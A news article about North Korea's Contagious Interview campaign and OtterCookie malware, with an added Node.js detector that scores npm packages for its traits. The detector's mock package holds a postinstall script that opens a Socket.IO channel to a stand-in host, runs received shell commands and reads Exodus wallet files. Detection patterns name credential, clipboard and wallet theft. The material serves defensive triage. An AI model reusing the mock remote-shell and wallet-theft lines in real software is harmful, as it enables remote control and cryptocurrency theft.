Ptechhub
North Korean Hackers Deploy OtterCookie Malware in Contagious Interview Campaign

The Hacker News, December 27, 2024


Dec 27, 2024Ravie LakshmananCryptocurrency / Cyber Espionage

North Korean threat actors behind the ongoing Contagious Interview campaign have been observed dropping a new JavaScript malware called OtterCookie.

Contagious Interview (aka DeceptiveDevelopment) is a long-running campaign in which the operators pose as recruiters and use job-themed lures to trick job seekers into downloading malware as part of a fake interview process.

Delivery relies on malware-laced videoconferencing apps or npm packages, hosted either on GitHub or on the official npm registry, which in turn deploy malware such as BeaverTail and InvisibleFerret.

Palo Alto Networks Unit 42, which first exposed the activity in November 2023, tracks the cluster as CL-STA-0240; it is also referred to as Famous Chollima and Tenacious Pungsan.

In September 2024, Singaporean cybersecurity company Group-IB documented the first major revision to the attack chain, highlighting the use of an updated version of BeaverTail that adopts a modular approach by offloading its information-stealing functionality to a set of Python scripts collectively tracked as CivetQ.


It is worth noting at this stage that Contagious Interview is assessed to be distinct from Operation Dream Job, another long-running North Korean campaign that also uses job-related decoys to start the infection process.

The latest findings from Japanese cybersecurity company NTT Security Holdings reveal that the JavaScript loader responsible for launching BeaverTail is also designed to fetch and execute OtterCookie. The new malware is said to have been introduced in September 2024, with a new version detected in the wild last month.

OtterCookie Malware

Upon running, OtterCookie establishes a connection to a command-and-control (C2) server using the Socket.IO JavaScript library and awaits further instructions. It runs operator-supplied shell commands to steal data, including files, clipboard contents, and cryptocurrency wallet keys. Socket.IO itself is a widely used, legitimate library, so the indicator for defenders is not the library but a Socket.IO channel that feeds received messages into shell execution.

The older OtterCookie variant spotted in September is functionally similar, but differs in one implementation detail: wallet-key theft is built directly into the malware rather than delivered as a shell command from the C2 server.
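As an added example (not code from the article, from NTT Security Holdings, or from any vendor named here), the following Node.js script turns the traits described above, for the npm-package delivery vector and for OtterCookie's behaviour, into a static triage heuristic over an extracted npm package. It looks for a Socket.IO client, shell execution, and wallet, clipboard and browser-credential access in the package's JavaScript, gives extra weight when the C2 channel and the shell execution sit in the same file, and checks package.json for install-time scripts (a generic supply-chain indicator; the article does not state that OtterCookie uses one). The indicator list, weights, thresholds, and the two sample packages are constructed assumptions for illustration, and the sample "suspicious" package is a mock, not real malware.

```javascript
// Added example: static triage of an npm package for the OtterCookie-style
// pattern described in the article (Socket.IO C2 + shell commands + wallet,
// clipboard and file theft). Indicators, weights and thresholds are assumptions.
"use strict";

// Each indicator is a stateless regex (no /g flag, so .test() has no lastIndex
// state) over a file's source text, plus a weight for the package score.
const INDICATORS = [
  { name: "socket.io-client import",
    re: /require\(\s*['"]socket\.io-client['"]\s*\)|from\s+['"]socket\.io-client['"]/, weight: 3 },
  { name: "child_process execution",
    re: /require\(\s*['"]child_process['"]\s*\)|\b(exec|execSync|spawn)\s*\(/, weight: 3 },
  { name: "wallet artifact path",
    re: /(Exodus|MetaMask|Electrum|\.config\/solana)/i, weight: 2 },
  { name: "clipboard access",
    re: /\b(pbpaste|xclip|xsel|Get-Clipboard|clipboardy)\b/, weight: 2 },
  { name: "browser credential store",
    re: /(Login Data|Local State|Cookies)\b/, weight: 1 },
];

// Names of the indicators that fire on one source file.
function scanSource(src) {
  return INDICATORS.filter((i) => i.re.test(src)).map((i) => i.name);
}

// files: { "relative/path.js": "source", "package.json": "{...}" }
function scoreNpmPackage(files) {
  const hits = new Map(); // indicator name -> files it fired in
  let remoteShellFile = null; // first file with C2 channel AND shell execution
  for (const [file, src] of Object.entries(files)) {
    if (!/\.(js|cjs|mjs)$/.test(file)) continue;
    const names = scanSource(src);
    for (const n of names) {
      if (!hits.has(n)) hits.set(n, []);
      hits.get(n).push(file);
    }
    if (names.includes("socket.io-client import") && names.includes("child_process execution")) {
      remoteShellFile = remoteShellFile || file;
    }
  }
  let score = 0;
  for (const i of INDICATORS) if (hits.has(i.name)) score += i.weight;
  if (remoteShellFile) score += 4; // the remote-shell combination is the key signal

  // Install hooks run code at `npm install` time: a generic supply-chain
  // indicator (assumption), not something the article attributes to OtterCookie.
  let installHook = null;
  if (files["package.json"] !== undefined) {
    try {
      const scripts = JSON.parse(files["package.json"]).scripts || {};
      for (const k of ["preinstall", "install", "postinstall"]) {
        if (scripts[k]) { installHook = k; break; }
      }
    } catch (e) {
      installHook = "unparseable"; // a broken manifest is itself worth a look
    }
  }
  if (installHook) score += 2;

  const verdict = score >= 8 ? "suspicious" : score >= 4 ? "review" : "clean";
  return { score, verdict, indicators: Object.fromEntries(hits), remoteShellFile, installHook };
}

// Load an extracted package directory (e.g. after `npm pack` + `tar xf`) into
// the files map. fs/path are required lazily so the scoring stays dependency-free.
function loadPackageDir(root) {
  const fs = require("fs");
  const path = require("path");
  const files = {};
  (function walk(dir) {
    for (const ent of fs.readdirSync(dir, { withFileTypes: true })) {
      const p = path.join(dir, ent.name);
      if (ent.isDirectory()) { if (ent.name !== "node_modules") walk(p); }
      else files[path.relative(root, p)] = fs.readFileSync(p, "utf8");
    }
  })(root);
  return files;
}

// Constructed sample packages (assumptions, not real packages or real malware).
const BENIGN_PKG = {
  "package.json": JSON.stringify({ name: "pad-ish", version: "1.0.0", main: "index.js" }),
  "index.js": "module.exports = (s, n) => String(s).padStart(n);\n",
};
const SUSPICIOUS_PKG = {
  "package.json": JSON.stringify({
    name: "interview-task", version: "1.0.0",
    scripts: { postinstall: "node setup.js" },
    dependencies: { "socket.io-client": "^4.0.0" },
  }),
  "setup.js": [
    "const io = require('socket.io-client');",
    "const { execSync } = require('child_process');",
    "const sock = io('http://example.invalid:1234');",
    "sock.on('command', (c) => sock.emit('result', execSync(c).toString()));",
    "sock.on('wallet', () => sock.emit('result', execSync('cat ~/.config/Exodus/exodus.wallet/*').toString()));",
  ].join("\n"),
};

for (const [label, pkg] of [["benign", BENIGN_PKG], ["suspicious", SUSPICIOUS_PKG]]) {
  console.log(label, JSON.stringify(scoreNpmPackage(pkg)));
}
```

To score a real package, extract its tarball and call `scoreNpmPackage(loadPackageDir("./package"))`. The output is a triage priority, not a verdict: Socket.IO and child_process both appear in plenty of legitimate tooling, and `exec(` also matches regex `.exec()` calls, so anything above "clean" should be read by a human, starting with the file reported in `remoteShellFile`.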

The development shows the threat actors actively updating their tooling while leaving the infection chain largely untouched, which suggests the campaign remains effective.

South Korea Sanctions 15 North Koreans for IT Worker Scam

It also comes as South Korea's Ministry of Foreign Affairs (MoFA) sanctioned 15 individuals and one organization in connection with a fraudulent IT worker scheme run by North Korea to generate a steady stream of illicit income for the regime, steal data, and in some cases extort ransoms.

There is evidence to suggest that the Famous Chollima threat cluster is behind this insider-threat operation as well. The operation is also tracked under names such as Nickel Tapestry, UNC5267, and Wagemole.


One of the 15 sanctioned individuals, Kim Ryu Song, was also indicted by the U.S. Department of Justice (DoJ) earlier this month for his alleged involvement in a long-running conspiracy to violate sanctions and commit wire fraud, money laundering, and identity theft by illegally seeking employment in U.S. companies and non-profit organizations.

Also sanctioned by MoFA is the Chosun Geumjeong Economic Information Technology Exchange Company, which is accused of dispatching large numbers of IT personnel to China, Russia, Southeast Asia, and Africa, where they raise funds for the regime by taking freelance or full-time jobs at Western companies.

These IT workers are said to be part of the 313th General Bureau, an organization under the Munitions Industry Department of the Workers’ Party of Korea.

“The 313th General Bureau […] dispatches many North Korean IT personnel overseas and uses the foreign currency earned to secure funds for nuclear and missile development, and is also involved in the development of software for the military sector,” the ministry said.

“North Korea’s illegal cyber activities are not only criminal acts that threaten the safety of the cyber ecosystem, but also pose a serious threat to international peace and security as they are used as funds for North Korea’s nuclear and missile development.”
